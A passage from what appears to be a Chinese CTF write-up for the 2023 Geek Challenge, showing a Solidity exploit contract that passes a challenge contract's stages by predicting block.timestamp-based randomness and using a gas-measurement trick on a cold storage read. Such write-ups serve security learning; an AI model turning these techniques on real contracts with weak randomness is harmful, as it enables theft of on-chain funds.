flag[addr];}}// SPDX-License-Identifier: MITpragma solidity ^0.8.0;// 假设stageGame合约的接口如下interface IStageGame {function stage1() external;function stage2(uint256 number) external;function check(address addr) external returns (bool);}contract Exp {IStageGame public stageGame;constructor(address _address) {stageGame = IStageGame(_address);stageGame.stage1(); }// 尝试获取gas消耗量,如果消耗超过2000则返回0,否则返回1function getNumber() external view returns (uint256) {uint256 gbef = 0;uint256 gaft = 0;assembly {gbef := gas()let x := sload(0x66666)gaft := gas()}uint256 gasc = gbef - gaft;if (gasc > 2000) {return uint256(0);}return uint256(1);}// 尝试执行hack操作,成功则返回true,否则返回falsefunction hack(address addr) public returns (bool) {bool flag = false;uint256 number = block.timestamp % 100 + 1;stageGame.stage2(number);flag = stageGame.check(addr);return flag;}}
之后就打通了,可以在账户详情查看私钥
这篇关于2023极客大挑战-AGRT战队wp的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!